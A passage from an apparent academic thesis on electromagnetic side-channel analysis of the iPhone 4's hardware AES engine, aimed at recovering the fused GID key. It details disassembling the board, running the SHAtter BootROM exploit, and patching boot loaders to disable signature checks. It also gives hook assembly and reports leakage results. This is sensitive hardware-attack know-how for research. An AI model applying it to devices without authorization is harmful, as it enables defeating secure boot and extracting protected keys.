kernel. Every component which is loaded before the kernel is executed (including the ker- nel itself) is shipped as an img3[Thec] image, which is cryptographically signed and encrypted with Cipher Block Chaining (CBC)-AES256[WFE]. Each img3 image contains an Initialization Vector (IV) and key, which are encrypted using a device model specific hardware fused Key Encryption Key (KEK) also called Group Identifier (GID) key. After the signature of the img3 image is verified, the GID key is used to decrypt the image specific IV and key, which are then in turn used to decrypt the image itself. The GID key is never exposed to the Central Processing Unit (CPU) directly. Instead decryption oracle queries are made to a dedicated hardware AES engine[ios], which uses the GID key internally. On newer iPhones (starting from the iPhone 4s) the second stage boot loader disables access to the GID key (enforced through hardware registers) before executing the kernel, meaning the operating system is not able to use it. Other key slots such as the User Identifier (UID) key, which is also only accessible by the AES engine, or user supplied keys can still be used by the operating system. The GID key cannot be re-enabled without rebooting the device. Thus, on newer iPhones, boot loader level code execution is required to make decryption queries to the AES engine using the GID key. This can be achieved either by using a BootROM exploit or by exploiting the first or second stage boot loader. 3Setup

This chapter describes the setup used to perform the side-channel analysis. First, the preparation of the target device for EM measurements is described. Then, the equipment used for performing the measurements and processing the data is introduced.

3.1 Target Device

For a practical analysis of side-channel attacks on early boot encryption the Apple iPhone 4 (model iPhone3,2) was chosen as a case study. The iPhone 4 has a BootROM vulnerability allowing code execution at the highest privilege level by using either the limera1n[Thed] or the SHAtter[Hil] exploit. It is possible to perform similar analysis on newer devices such as the iPhone 8 or the iPhone X by using the checkm8[@ax] exploit, however at the time of starting this thesis checkm8 was not available and thus the iPhone 4 was chosen. The iPhone 4 has a hardware AES engine[ios] which is used to decrypt the first stage boot loader, the second stage boot loader and among others, the kernel using the GID key. The GID key is fused into hardware and is never exposed directly to the CPU, only oracle access is possible. To gain access to the CPU, the iPhone is first disassembled, the mainboard removed from its case and all peripherals are disconnected. Then, the shielding protecting the CPU is removed so that an EM probe can be placed on the chip. This can be seen in Figure 3.1.

(a) With shielding (b) Without shielding

Figure 3.1: iPhone 4 mainboard with and without metal shielding

Next, a Universal Asynchronous Receiver Transmitter (UART) connector is built[Ess] using a PodBreakout[pod] connector and a FT232RL USB to Serial Breakout Board[FT2]. This yields a connector as seen in Figure 3.2 with two USB cables, one for communicating with the iPhone and one for UART. Additionally, the volume buttons are removed from the case and wires are connected to the volume-down button (as seen in Figure 3.3) for easy access. This is done because 20 3Setup

(a) PodBreakout (b) FT232R

Figure 3.2: 30 pin iPhone connector with UART exposed

these buttons are directly connected to the SoCs General Purpose Input/Output (GPIO) pins, thus providing a fast and low latency interface to the CPU.

Figure 3.3: Exposing iPhone GPIO pins

Afterwards, the battery connector is removed (Figure 3.4) and the mainboard is driven with a lab power supply at 4.0 volts (which is slightly above the normal battery voltage) draining on average about 0.1 ampere during the measurements. Finally, the mainboard is mounted on a stage as seen in Figure 3.5, where an EM probe can be moved around the chip precisely using stepper motors, which are controllable via computer. 3.2 Measurement Setup 21

Figure 3.4: iPhone 4 mainboard with battery connector removed

Figure 3.5: iPhone 4 mainboard mounted on a stage

3.2 Measurement Setup

The LeCroy WaveRunner 8254M is used for performing EM measurements (see Figure 3.6). Two of the four channels are used for the trigger signal and EM probe, which allows to have a sampling rate of 40GS/s. The vertical resolution is 8 bit per sample. We use a Langer EMV-Technik RF-B 0,3-3 probe, which has a flat head with a diameter of 2mm that allows to capture frequencies in the range from 30MHz to 3GHz. The probe is connected to a Langer EMV-Technik PA 303 SMA amplifier, which amplifies signals in the range from 100kHz to 3GHz by 30dB, before the signal is passed to the oscilloscope.

3.3 Computations

All computations were performed on a machine with 20 physical (40 logical) Intel(R) Xeon(R) CPU E5-2650 v3 @ 2.30GHz CPU cores with 256GB RAM, 3 (logical) NVIDIA K80 GPUs with 12 GB VRAM each and 15 TB of network attached storage. Even though not all resources were maxed out (mostly the GPUs were used), as- 22 3Setup

Figure 3.6: LeCroy WaveRunner 8254M oscilloscope sumptions, choices and estimations made during development of algorithms kept these resources in mind. Furthermore, the correlation computations for the final attack were distributed among this machine and additional 20 machines with 8 (logical) Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz, 16 GB RAM and an Intel Corporation HD Graphics 530 Graphics Processing Unit (GPU) each, to speed up computations. 4 Boot Loader Code Execution and AES Engine Access

In this chapter the methodology to access the AES engine as well as how to deploy a boot loader payload is described. This is required in order to perform EM measurements on the target device.

4.1 Entrypoint

Even though on the iPhone 4 the GID key can be used by the operating system in kernel mode or from userspace (when a kernel patch is applied), the entrypoint chosen here is a BootROM exploit (SHAtter[Hil]). The ability to execute code in BootROM context is used to load a patched first and second stage boot loader with signature checks disabled. Furthermore, a custom payload is deployed to the second stage boot loader. This has the advantage that the CPU is less noisy as only a single core is running and every other core is inactive. Also, the deployed custom payload is the only piece of code running during the measurements without interrupts or other threads interfering.

4.1.1 Preparation of Images

The following steps are performed to patch and prepare the boot loader images in order to be able to execute a custom payload. First, the iPhone iOS 7.1.2 firmware file is downloaded from Apple. Then, iBSS and iBEC are extracted, which are the first and second stage boot loader when performing a restore from DFU mode. Next, the images are decrypted using xpwntool[Wan] and the corresponding firmware keys obtained from theiphonewiki[Thee]. Afterwards, the images are patched using iBoot32Patcher[Fra] to remove the signa- tures checks and to redirect iBECs go command to jump to the load address (the location in memory where data received over USB is stored), which is 0x40000000 in our case. Since the iPhone has a 32-bit ARM CPU, the address is set to 0x40000001 to indicate that our payload will be executed in THUMB[ARM] mode. Finally, the raw binaries are packed back into an img3 file, which can be parsed by the BootROM. The full procedure can be seen in Listing B.1. 24 4 Boot Loader Code Execution and AES Engine Access

4.1.2 Payload Execution

The following steps are performed in order to get a custom payload running in the second stage boot loader. First, the iPhone is put into DFU mode. This is done by connecting the device to a computer using a USB cable and afterwards holding down the power button and home button for 10 seconds, then releasing the power button while still holding the home button for another 15 seconds. The screen stays black when DFU mode is entered successfully. After the iPhone entered DFU mode, ipwndfu[@ax] is used to launch the SHAtter exploit to disable signature checks in BootROM. Subsequently, irecovery[libb]isused to transfer the patched first and second stage boot loader. After loading the second stage boot loader, irecovery is used to first transfer a custom payload binary and then to interact with the second stage boot loader recovery console. By executing the previously patched go command, the uploaded payload is executed. The procedure can be seen in Listing B.2. Note: Listing B.2 boots the payload on a slightly dierent model (iPhone3,1), however the procedure is exactly the same on iPhone3,2.

4.2 Payload Creation

This section sums up the most important parts of Modern post exploitation techniques[@ti] and deals with how to create the payload. First, the program is written in C, then compiled to a Mach-O[App] binary and finally transformed into a freestanding raw binary which can be executed in boot loader context. In boot loader context we are dealing with an almost bare metal execution environment, thus certain restrictions apply when creating the program. The main restriction is that no external libraries can be used. To simplify the process of converting the program into a raw executable, all code is written into one single file. The main function needs to be put at the top, because the entrypoint of the program will be the very first function in the file. To provide a rudimentary environment, some functions of the standard C library are manually re-implemented with a functional equivalent. Those are: memset, memmove, strcmp, strncmp, strlen, atol. The final program is compiled on macOS using the following command:

xcrun -sdk iphoneos clang -arch armv7 gido.c -o gido.o -c -fno-stack-protector -nostdlib -Wno- incompatible-library-redeclaration

We use the clang[cla] compiler together with the iPhone Software Development Kit (SDK), which are both shipped with Xcode[Xco]. The arguments used specify that the target CPU is ARMv7 (-arch armv7), the output file is gido.o (-o gido.o), the program is compiled as object file (-c) rather than a full executable, stack cookies (-fno-stack-protector) and standard libraries (-nostdlib) are not used and warnings for re-declared standard library functions with dierent types are ignored (-Wno-incompatible-library-redeclaratio). 4.3 Payload Description 25

Afterwards, the individual sections are extracted from the resulting object file using jtool[Lev] as shown in Listing 4.1. Finally, the extracted sections are assembled into a binary file, minding the alignment and spacing between individual sections, using the script in Listing B.3.

jtool -e __TEXT.__text gido.o >/dev/null 2>/dev/null jtool -e __DATA.__data gido.o >/dev/null 2>/dev/null jtool -e __TEXT.__cstring gido.o >/dev/null 2>/dev/null jtool -e __TEXT.__const gido.o >/dev/null 2>/dev/null jtool -e __TEXT.__literal8 gido.o >/dev/null 2>/dev/null jtool -e __TEXT.__literal16 gido.o >/dev/null 2>/dev/null Listing 4.1: Using jtool to extract certain sections of a Mach-O file

4.3 Payload Description

This section will describe the program used to perform on device measurements, its source code can be found in Listing B.4. The first lines (line 6 and 7) include headers for standard types like uint32_t and size_t. Then, (lines 10-56) an AES S-Box and a static known key with all its round keys for AES-128, as well as function definitions and global variables for an AES-128 T-Table (see Section 2.1.1.2) implementation are defined. Subsequently, lines 57-97 define reverse engineered boot loader internal structures and types. These are mostly taken from the Chronic-Dev cyanide[tea] project on github. Next, lines 100-119 define function pointers for internal functions with their corre- sponding memory address. This allows calling boot loader functions as they are already loaded in memory. Lines 120-126 define constants and a global pointer to the boot loaders command structure, which is used for parsing commands from the recovery console. After that (lines 128-155) function definitions used within this payload are declared.

4.3.1 Payload Entrypoint The actual code starts at line 157, with the entrypoint being an assembly stub at lines 161-164, jumping into the reposition function (line 166). The purpose of the entrypoint assembly stub is to pad the code by 0x100 bytes (line 163), so that when the boot loader overwrites a few bytes at the beginning of the load address (where the payload lives at its invocation) it does not corrupt code or data. Next, the reposition function relocates the payload into the heap and jumps to the main function, thus making the load address available for other use.

4.3.2 Main Function The main function (line 183) first overwrites the command handler structure replacing built-in recovery console commands with custom commands (lines 187-220). Afterwards, it reconfigures the volume-down button GPIO pin to be a signal output rather than an input, thus making it possible to drive the wires exposed in Figure 3.3 high or low 26 4 Boot Loader Code Execution and AES Engine Access

depending on the value written to a special Memory Mapped Input/Output (MMIO) address (lines 222-225). In addition the T-Tables of the custom software AES-128 implementation are precomputed (lines 227-229) and a hook (see Section 4.3.3) is placed in the boot loaders builtin AES function.

4.3.3 AES Hook The function responsible for placing the hook can be seen in lines 278-297. The hook replaces the instructions seen in Listing 4.2, which start two previously set up Direct Memory Access (DMA) transfers, one for sending and one for receiving, then calls a function which waits until the transfers are finished. The sending transfer will signal that it is done, once the transfer reached the AES engine, while the receiving transfer will only be done, after the AES engine decrypted the ciphertext and the plaintext was transferred back to the DMA region.

start_aes_encryption: 0x5ff02138 orr r1, r1,#0x1 0x5ff0213c str r1,[r0] 0x5ff0213e movw r0,#0x2000 0x5ff02142 movt r0,#0x8700 0x5ff02146 ldr r1,[r0] 0x5ff02148 orr r1, r1,#0x1 0x5ff0214c str r1,[r0] 0x5ff0214e movs r0,#0x1 0x5ff02150 bl wait_and_yield 0x5ff02154 movs r0,#0x2 0x5ff02156 bl wait_and_yield finished_aes_encryption: Listing 4.2: Assembly of boot loaders AES engine invocation

The code that is being executed instead can be seen in Listing 4.3. First, the GPIO address of the volume-down button is loaded into the register r4 and the values needed to drive the signal low and high are loaded to registers r0 and r1,respectively(lines 240-243). Then, the receive DMA channel is started (lines 247-252). It is important to start the receive channel first, because it will not finish until the AES engine transferred the decrypted plaintext into the DMA region. This however can only happen after the AES engine finished the decryption, which in turn relies on the transmission channel having finished transferring the ciphertext to the AES engine in the first place. Thus, starting the receive channel is equivalent to being able to check whether the decryption finished or not. Afterwards, the values required to start the transmission channel are loaded into register r6 (lines 255-256) and register r7 (lines 258-259). This setup creates a tight time critical relationship between a GPIO signal and the AES decryption (lines 261-273). Next, the exposed GPIO pin is driven high by writing a value to the corresponding MMIO address with a single store instruction (line 262) and immediately after that the DMA transfer channel is started with another store instruction (line 265). This causes the previously set up ciphertext to be transferred to the AES engine and the decryption to start. Subsequently, follows a tight loop (lines 267-271) which checks whether the 4.3 Payload Description 27

receive channel finished the transfer, indicating end of decryption. Once that happens the exposed GPIO pin is set back to low (line 273). This tightly narrows down the AES decryption between the high and low edge of the GPIO signal. Hence, this is used as trigger for starting the measurements with the oscilloscope each time the AES engine is used.

237 void aes_function_hook(){ //realAES 238 asm( 239 //prepare GPIO write 240 "movs r4, #0xc\n\t" 241 "movt r4, #0xbfa0\n\t" 242 "mov r0, #0x92\n\t" 243 "mov r1, #0x93\n\t" 244 245 246 //prepare DMA access 247 "movw r5, #0x2000 \t\n" //RX (r1) 248 "movt r5, #0x8700 \t\n" 249 250 "ldr r7, [r5]\t\n" //RX_val 251 "orr r7, r7, #0x1\t\n" //RX_val 252 "str r7, [r5]\t\n" //store RX first! 253 254 255 "movw r6, #0x1000 \t\n" 256 "movt r6, #0x8700 \t\n" //TX (r0) 257 258 "ldr r7, [r6]\t\n" //TX_val 259 "orr r7, r7, #0x1\t\n" //TX_val 260 261 //about to enter time critical section! 262 "strb r1, [r4]\n\t" //set GPIO high (AES_START) 263 //START_CRITICAL_SECTION 264 265 "str r7, [r6]\t\n" //store TX (AES_START) 266 267 "w1:\t\n" 268 "ldr r7, [r5]\t\n" //RX_val 269 "and r7, r7, #0x30000\t\n" //load RX_val and check for idle 270 "cmp r7, #0x10000\t\n" 271 "beq w1\t\n" 272 //-- END_CRITICAL_SECTION 273 "strb r0, [r4]\n\t" //set GPIO low 274 ); 275 } Listing 4.3: AES function replacement code 28 4 Boot Loader Code Execution and AES Engine Access

4.3.4 Command Handlers Command handler functions are implemented in lines 301-855. These replace some of the original recovery console commands after the main function finished. New commands are cmd_echo, cmd_call, cmd_md, cmd_mw, aes_cmd, cmd_decypt and cmd_measure. The first four commands are intended for debugging and reverse engineering the boot loader. They allow printing text to the recovery console, calling arbitrary functions with parameters by jumping to a specified address, as well as reading and writing memory, respectively. Calling aes_cmd starts an infinite loop of AES encryptions or decryptions with custom specified block length. This is useful for visually inspecting EM traces with an oscilloscope to find a good position for the EM probe on the chip as well as the right voltage range settings. The aes_decypt function is used to decrypt several blocks of ciphertext using the GID key. This is useful for decrypting a batch of ciphertexts from recorded traces, as the AES output is not saved during measurement phase for performance reasons. Furthermore, it is possible to parallelise batch decryption by using multiple iPhones of the same model. Finally, cmd_measure is used when performing EM measurements. The function first disables the (cooperative) scheduler (lines 380-381) to ensure the function does not get interrupted during execution. Then, a loop is entered, which serves a custom console accessible over UART. This measure mode console listens for custom commands which invoke the AES engine in specific modes according to the supplied parameters. Using the custom software AES-128 implementation as pseudorandom number generator (PRNG), input blocks are generated which are then sent to the AES engine. This way a user specified number of batch encryptions are performed before the next command is received. Due to the patch applied in Section 4.3.3 the GPIO is driven high each time the hardware AES engine starts and low each time it finishes. The function can be exited by pressing the volume-up button, which re-enables the scheduler and returns to the boot loader recovery console.

4.3.5 Helper Functions Several helper functions are implemented to aid development. For example, lines 856-877 provide wrapper functions for invoking the AES engine, lines 878-957 provide helper functions used within the program and lines 958-1011 provide standard library functions (as already mentioned in Section 4.2). Lastly, the T-Table based AES-128, which is used as PRNG during the measurements, is implemented in lines 1012-1065. 5 AES Side-channel Analysis

After creating the tools required to perform EM side-channel measurements as described in the previous chapters, the next step is to gather as much information about the target as possible. This chapter deals with analysing the AES engine and recovering the GID key through performing a CPA utilizing EM measurements during decryption.

5.1 AES Engine Modes

By reverse engineering the boot loader and using publicly available (reverse engineered) resources[tea], we learn that the AES engine can be used for encryption and decryption. It is possible to select either the hardware fused device specific UID key, the hardware fused device model specific GID key or to supply a custom key. Furthermore, the hardware engine supports encrypting/decrypting multiple blocks in 128-bit, 192-bit and 256-bit AES CBC mode with the previously mentioned key options.

5.2 AES Timing

To get an idea of how much time it takes for the AES engine to perform a single decryption, we measure the time between a rising and falling edge of the GPIO signal which roughly marks the start and end of the decryption as described in Section 4.3.3. Although the signal does not only cover the AES itself, because CPU instructions and Input/Output (I/O) transfers to and from the engine take time themselves, it indicates a time frame in which the AES runs. Figure 5.1 shows multiple decryption traces in CBC mode with dierent number of blocks being decrypted. The GPIO signal is colored in blue, while the EM-signal is colored in red. It can be seen that the time between the rising edge and falling edge increases, although not proportional to the amount of blocks being decrypted. Furthermore, there are some patterns in the signal with certain parts always staying the same, while other parts dier. By plotting all decryptions traces of 1 to 16 blocks on top of each other as seen in Figure 5.2, we can see that the first three peaks are exactly the same for all plots (ignoring noise and jitter) and only after the third peak the traces dier. This suggests some kind of preamble like latency, I/O transfer or core initialization during the first 800ns. Furthermore, the peaks at 1000ns and 1800ns in Figure 5.1a are possibly start/stop signals, as the distance between them increases with the amount of blocks, while the distance between the rising/falling edge to those peaks stays roughly the same. 30 5 AES Side-channel Analysis

To further analyse this, two green lines where added to the plots in Figure 5.1. The upper green line represents the duration of the GPIO signal staying above 1V and the lower green line represents the distance between the hypothetical start/stop signals. Figure 5.3 lists the durations of the GPIO and EM signals. The first column shows the number of blocks being decrypted, while the next two columns show the time of the GPIO signal being above 1V (upper green line in Figure 5.1) and the hypothetical AES duration (lower green line in Figure 5.1) divided by the number of blocks being decrypted. Next, the same timings, without a division by the number of decrypted blocks, follow. Finally, the last column shows the dierence between the GPIO time and hypothetical decryption time, essentially showing the overhead induced through additional previous and subsequent operations. The time per block in both, the second and third column in Figure 5.3 decreases with the number of blocks being decrypted, suggesting that this is not a very reliable approach, as one would expect to see a similar time per block when dividing by the number of decrypted blocks. Yet this still oers making some assumptions for the underlying implementation. One is that due to the fact that the hypothetical decryption time per block decreases more slowly with the number of blocks being decrypted (third column), it is assumed that the overhead averages out when decrypting more blocks and thus the last row in the third column gives the best approximation so far, which is less than 124ns per block. Another can be seen in row 2, 3 and 4 of the fourth column, showing that the total duration of the GPIO signal being high does not change despite the fact that dierent number of blocks are being decrypted. The hypothetical decryption time on the other hand in row 2, 3 and 4 of the fifth column does increase (keeping in mind the noise) and the dierence between GPIO and peak stays roughly the same (row 2, 3 and 4 in column 6). This eect might be caused by the structure described in Section 4.3.3, because if the decryption ends right after the load in line 270 Listing 4.3, the CPU needs to execute 8 more instructions, taking up several clock cycles, before the GPIO goes low. Also, the increase in duration in row 1 and 2 of the 5-th column supports the hypothesis of a decryption taking around 120ns or less. Summing up the analysis of this section, we assume that a single AES decryption takes less than 120ns and that the previously described peaks are start/stop indicators for the AES engine. During these tests it was noticeable that when decrypting less than 3 blocks, the falling edge jitters a lot, while decrypting more blocks seems to yield more time constant traces. This is likely due to I/O transfers and synchronizations between the AES engine and the CPU, since the GPIO edge is driven by the CPU rather than the AES engine. Further information about the implementation cannot be recovered by solely looking at the traces. Subsequent analysis (Section 5.5) reveals that the signal seen in between the assumed start and stop peak is not the AES itself, but rather I/O transfers. 5.3 Initial Probe Placement 31

5.3 Initial Probe Placement

In the previous section we discussed that by decrypting multiple blocks in CBC mode the traces jitter less, which makes alignment easier. Because of this, a block size of 8 blocks was chosen for further analysis. By manually moving the EM probe around the SoC, a position for further analysis was chosen based on where the signal showed a promising pattern, which is, a position where the number of peaks correlate with the number of blocks being decrypted and the peaks yield a strong signal.

5.4 Non-Specific t-test

The first step when assessing leakage is to perform the Non-Specific t-test (see Sec- tion 2.2.1) in order to check whether the traces of a fixed input AES invocation set can be distinguished from a set of random input invocations. For this test it is not necessary to know the AES key, as decryption of the same input produces same intermediate states. In case the implementation does leak, the fixed input decryptions should yield similar EM traces (ignoring the noise), which should be distinguishable from random input decryption traces. To get a better approximation on whether key extraction is possible, this test is performed using the targeted GID key. The measurement setup looks as follows: First, the payload (as discussed in Section 4.3) is deployed and executed on the target device. Afterwards, measure mode (see Section 4.3.4) is entered, so that the device listens for commands over UART. Then, two seeds of 16 bytes each and an integer specifying the number of sequen- tial decryptions are sent to the device. The seeds are fed into a PRNG,whichis constructed by encrypting a block with AES-128 using a software AES with the key 0102030405060708090a0b0c0d0e0f, then using the output as input for the next encryption, as well as PRNG output. The first seed is called encryption_seed.ItsPRNG output is used to get random blocks for AES decryption. The second seed is called selection_seed. It determines whether the next invocation of the AES engine uses the input generated by the encryption_seed, or the fixed input (see Listing B.4 lines 472-476). This is repeated the amount of times the previously sent counter specifies. Afterwards, the device listens for a new command. After one iteration, the program on the host sends another command, repeating the procedure until (in this case) 10Õ000Õ000 traces are recorded. Subsequently, the traces are aligned and filtered using the method described in Sec- tion 6.1. Since the traces are noisy and jittery, the main goal here was to align the traces at the start signal as good as possible. Figure 5.4a shows a plot of 500 aligned traces. As seen in Figure 5.4b the first order t-test shows significant leakage over the threshold value of 4.5/ 4.5 (as indicated by two red lines) throughout the whole trace. This ≠ suggests that an EM side-channel attack might be possible. Figure 5.4d shows the t-value plotted on top of a trace. The highest t-value is 23274 at 32 5 AES Side-channel Analysis

sample 46203,whichis11607 samples after the assumed start signal (at sample 34596). This corresponds to about 290ns as the oscilloscope has a sampling rate of 40GS/s. The value of 290ns does not relate to the assumed value of 120ns from Section 5.2, but assuming the highest t-value is caused by AES output I/O transfer, it is likely that (at least some) AES decryptions take place right before the peak.

5.5 Signal-to-Noise Ratio

After having discovered leakage in the previous section, it is useful to know how much signal can be found in the traces. Therefore, 10Õ000Õ000 traces were recorded similar to what is described in Section 5.4, but this time just random blocks were decrypted using a known key. One recorded trace covers the decryption of 8 blocks in CBC-AES-256 mode. The power models used here are the 8-bit hamming weight of the sixth ciphertext byte and the 8-bit hamming weight of the sixth plaintext byte (other bytes of the ciphertext/plaintext yield similar results). The SNR traces for both models for each of the 8 blocks are visualized in one single plot in Figure 5.5a. The peaks in between sample 10Õ000 and 20Õ000 correspond to the power model HW(ciphertext[5]) and the peaks after sample 40Õ000 correspond to HW(plaintext[5]). Ciphertext and plaintext SNR of the same block are plotted using the same color. The SNRs seen in Figure 5.5 are assumed to visualize I/O transfers to and from the AES engine, rather than the internal state of the AES engine. There are several indicators that support this hypothesis. One is that all ciphertext SNRs can be observed in the beginning of the trace, while the plaintexts are seen much later. Figure 5.5b shows a close up of the ciphertext SNRs. We can see that the individual blocks are transferred sequentially in order from the first to the last block. Measuring the distance between the (arbitrarily picked) third peak of each block yields that they are almost exactly 200 samples apart, which corresponds to 5ns required to transfer one block to the AES engine. This is far below the assumed 120ns from Section 5.2 required for one decryption. Figure 5.5d shows the SNR plotted on top of a trace. We can see that the peaks of the SNR overlay with the bigger peaks of the EM signal, which can be explained with I/O transfers being much more dominant (in terms of EM emanation) than data being processed by a single hardware module. By examining Figure 5.5c we can see that the plaintext blocks are transferred back in the same order they were sent to the AES engine, however there is a delay between some blocks. The first plaintext block is received 31286 samples (782.15ns) after the last ciphertext block was sent (the distance between the highest peak of ciphertext block 8 at sample 16063 and the highest peak of plaintext block 1 at sample 47349 in Figure 5.5a). Then, the SNR color switches 4 times every 200 samples (5ns) in Figure 5.5c, which means a plaintext block is transferred every 5ns. Afterwards, there is a delay of 5800 samples (145ns), before the next two plaintext blocks are transferred. Then, there is again a delay and again two blocks are transferred. 5.5 Signal-to-Noise Ratio 33

It is assumed that the pattern of first 4 blocks then repeatedly a delay and 2 blocks continues when more blocks are decrypted. Figure 5.1e seems to support that, however the hypothesis was not investigated further. At this point the hypothesis from Section 5.2 of the peak between sample 30Õ000 and sample 40Õ000 (Figure 5.5d) being a start signal does no longer seem to hold, as it is in the middle of where at least 4 decryptions take place. It is possible that the first peak in the example EM trace at sample 6500 (Figure 5.5d) is indicating the start of an I/O transfer and the peak at sample 22Õ000 is indicating the stop of an I/O transfer, with the peak around sample 15Õ000 being the I/O transfer of the ciphertext itself. Thus, the peak at sample 22Õ000 might be some kind of AES start signal, however this cannot be proven at this point. Fact is that at least 4 decryptions have to take place between sample 16063 (highest peak of the last ciphertext block in Figure 5.5d) and sample 47948 (first peak of the forth plaintext block in Figure 5.5d). Also, due to the fact that large EM signal peaks are I/O transfers, further measurements should increase the resolution for small voltage changes by allowing very large peaks, probably corresponding to I/O transfers, to go out of the captured voltage range of the oscilloscope and focus on the time frame ranging from sample 22Õ000 to sample 46Õ000. Further power models were tested to check whether a signal can be seen from the AES engine itself, however none of them yield a SNR above the threshold of noise. Performing another measurement with the previously described voltage range and time frame settings did not yield any significant results either. A list of models which were tested with various combinations of input/output bytes can be found in Figure 5.7. The notation is explained in Figure 5.6. 34 5 AES Side-channel Analysis

Notation Explanation Ki Key byte index i Kr Full r-th round key Ci Ciphertext byte index i Pi Plaintext byte index i Bi Both: plaintext and ciphertext byte index i were tested Sr,i State byte index i in AES round r Sr Full state in AES round r HW ( ) n bit hamming weight n · V ( ) Byte value ranging from 0 to 255 · Z( ) Zero value model (0 if input is zero else 1) · T ( ) 32-bit output of i-th inverse AES T-Table iÕ · S( ) / S ( ) AES (inverse) S-Box · Õ · P ( ) / P ( ) AES (inverse) permutation · Õ · MC ( ) AES inverse MixColumns Õ · Figure 5.6: Power model notation

V (Bi) HW8(Bi) HW (B B B B ) 32 i| i+1| i+2| i+3 V (S (C K )) Õ i ü i HW (S (C K )) 8 Õ i ü i Z(C K ) i ü i HW (T (C K )) 32 0Õ 4 ü 4 HW (T (C K )) 32 1Õ 13 ü 13 HW (T (C K )) 32 2Õ 10 ü 10 HW (T (C K )) 32 3Õ 7 ü 7 HW (T (C K ) T (C K )) 32 0Õ 4 ü 4 ü 1Õ 13 ü 13 HW (T (C K ) T (C K ) T (C K )) 32 0Õ 4 ü 4 ü 1Õ 13 ü 13 ü 2Õ 10 ü 10 HW (T (C K ) T (C K ) T (C K ) T (C K )) 32 0Õ 4 ü 4 ü 1Õ 13 ü 13 ü 2Õ 10 ü 10 ü 3Õ 7 ü 7 HW (T (C K ) (C C C C )) 32 0Õ 4 ü 4 ü 0| 1| 2| 3 HW (T (C K ) (C C C C ) (K K K K )) 32 0Õ 4 ü 4 ü 0| 1| 2| 3 ü 0| 1| 2| 3 V (S1,i) HW8(S1,i) HW (S S S S ) 32 1,i| 1,i+1| 1,i+2| 1,i+3 V (P (S (C K )) K ) Õ Õ i ü i ü i+16 HW (P (S (C K )) K ) 8 Õ Õ i ü i ü i+16 Figure 5.7: Tested power models 5.6 AES CPA Power Models 35

5.6 AES CPA Power Models

Using SNR as a method to test power models poses a limitation as it might, depending on the power model, consume too much memory to compute eciently. The next step in leakage assessment is to search for a suitable power model. Without further information about the implementation, which is not available to us, the best approach is educated guessing and ecient testing. Choosing CPA over SNR as a tool for further analysis allows ecient testing of 128-bit hamming weight models, since CPA computes a single hypothetical trace rather than creating 129 groups of traces. For further analysis, another measurement of 51Õ000Õ000 traces (after filtering) was performed with focus on the time frame ranging from sample 22Õ000 to sample 46Õ000 (Figure 5.5d) with a higher voltage sensitivity, as described in Section 5.5. A list of additional power models tested for 8 block CBC-AES-256 decryption, using correlation can be found in Figure 5.8. Again, notation from Figure 5.6 is used.

HW128(Sr) HW128(SÕ(P Õ(Sr))) HW (S (P (S )) K ) 128 Õ Õ r ü r HW (MC (S (P (S )) K )) 128 Õ Õ Õ r ü r HW (S S ) 128 r ü r+1 HW (P (S ) P (S )) 128 Õ r ü Õ r+1 HW (S (P (S )) S (P (S ))) 128 Õ Õ r ü Õ Õ r+1 HW (S (P (S )) K S (P (S )) K ) 128 Õ Õ r ü r ü Õ Õ r+1 ü r+1 HW (MC (S (P (S )) K ) MC (S (P (S )) K )) 128 Õ Õ Õ r ü r ü Õ Õ Õ r+1 ü r+1 Figure 5.8: Additional large power models

5.7 Leaking Power Model

Evaluating the results from the previous section yields that the model HW (S S ) 128 r ü r+1 shows significant leakage. Although AES-256 decryption is used, the power model is easier to describe by modeling it with encryption, which is, taking the 128-bit hamming weight of the state in a round after sbox and permutation xored with the very same state in the next round. For example, when attacking the first round of encryption, the model is HW ((P K) P (S(P K))). 128 ü ü ü The correlation of the leaking model is computed for round 0-14 and plotted in Figure 5.9, with round 0 corresponding to the state after initial key addition. Listing B.5 shows the source code of the OpenCL power model kernel function. The round is selected by modifying the G_SELECTOR_ROUND macro in line 4. Figure 5.9a shows the decryption of the second block. With the exception of round 0, the power model yields a visible peak for every round. 36 5 AES Side-channel Analysis

Even though not all peaks significantly rise above the threshold of noise, the fact that the peaks of the individual rounds are located close to each other in the correct order with equal distance between each other, is a strong indicator of the peaks being a real signal rather than just noise. The highest peak of each round is 200 samples apart from the highest peak of the next round. Thus, we can conclude that one single round takes 5ns. Therefore, 14 rounds of AES take 70ns. However, AES-256 decryption of one single block takes 95ns. The value is obtained by taking the distance between the first red peak at sample 804 and the first green peak at sample 4604 in Figure 5.9d, which is 3800 samples. This corresponds to the first round of the second block (see Figure 5.9a) and the first round of the third block (see Figure 5.9b), respectively. Assuming a round is processed in one single clock cycle, this corresponds to a clock speed of 200MHz. The nature of the leaking power model and the fact that none of the other tested power models yield correlation above the threshold of noise, support the hypothesis of one round being processed in one single clock cycle (thus resulting in a 200MHz clock speed). However, it is not known whether the clock for the AES engine actually runs at that speed. Furthermore, Figure 5.9d shows that the individual blocks are processed immediately after one another. Taking the time between round 14 of the second block at sample 3407 and round 1 of the third block at sample 4607 yields time interval of 30ns. Although, technically the decryption of block 3 starts one cycle earlier. This is because the round 1 peak represents the state in the first round xored with the state after the initial key addition. Therefore, the time interval between two blocks is 25ns, rather than 30ns. This confirms the hypothesis from Section 5.5, that the SNR peaks seen in Figure 5.5 are caused by I/O transfers. Figure 5.9e shows the correlation of every round of block 2 to 6 on top of a trace. The EM signal in the middle of the trace is the same peak that was previous believed to be the start signal in Figure 5.1. It is the same peak as the one in between sample 30Õ000 and sample 40Õ000 in Figure 5.5d. Since the decryption takes place in parallel to other processes like I/O transfers or DMA start/stop signals, the decryption of some blocks is drowned out by noise as seen at block 4 in Figure 5.9c and Figure 5.9e. Therefore, it makes sense to decrypt and measure multiple blocks and to focus on blocks which are not overlaid by noise.

5.8 Evaluating Smaller Power Models

The advantage of testing 128-bit power models is that it is more likely to find a signal which stands out from noise. Assuming the full 128-bit state is updated to a register at once, the 128-bit hamming distance power model will stand out a lot more compared to smaller power models like 64-bit, 32-bit, 16-bit or 8-bit hamming distance models. Even though this is a good method to learn about the implementation, in case such a leaking power model is found, it is not practical for mounting an attack. Testing smaller hamming models yields that 5.9 Full Chip Scan 37

